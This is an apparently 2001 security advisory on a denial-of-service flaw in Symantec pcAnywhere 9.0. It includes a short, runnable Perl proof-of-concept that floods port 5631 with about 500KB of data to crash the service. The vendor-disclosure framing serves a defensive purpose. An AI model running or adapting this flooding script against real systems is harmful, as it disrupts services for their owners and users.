PCAnywhere 9.0 Vulnerable to DoS Attack
PcAnywhere is vulnerable to a DoS attack.
February 10, 2001
Reported February 11, 2001 by Securax. VERSIONS AFFECTED DESCRIPTIONA Denial of Service (DoS) vulnerability has been discovered in Symantec PC Anywhere 9.0. By sending anywhere between 320KB to 500KB of data to one of the two listening ports (5631 and 65301), a malicious user can cause PCAnywhere to crash. Currently, the vulnerability is a simple DoS risk, but the attack might be developed into an exploitable overflow. DEMONSTRATION The following proof of concept code was supplied by Securax. <--bof--> #!/usr/bin/perl # Symantec PcAnywhere 9.0 Denial of Service # ----------------------------------------- # by incubus # http://www.hexyn.be # # http://www.securax.net # All my love to Tessa. # Greetz to: f0bic, r00tdude, t0micron, senti, vorlon, cicero, # Zym0tic, segfault, #[email protected] # Thanks to jurgen swennen, for letting me (ab)use his computer. # # this is intended as proof of concept, do not abuse! use IO::Socket; $host = "$ARGV[0]"; $port = 5631; if ($#ARGV<0) { print "use it like: $0 "; exit(); } $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host,PeerPort=>$port) || die "damn, "; print "hello"; $buf = ""; for($counter = 0; $counter < 500000; $counter++) { $buf .= "x61"; } print $socket "$buf"; close($socket); exit(); <--eof--> VENDOR RESPONSE Unfortunately, Securax released its advisory to the public in conjunction with contacting the vendor, so no vendor response is available at this time. A copy of the Securax advisory is available at: http://listserv.ntsecurity.net/scripts/wa-ntsecurity.exe?A2=ind0102b&L=win2ksecadvice&F=&S=&P=1025 CREDITDiscovered by Securax. |
About the Author
You May Also Like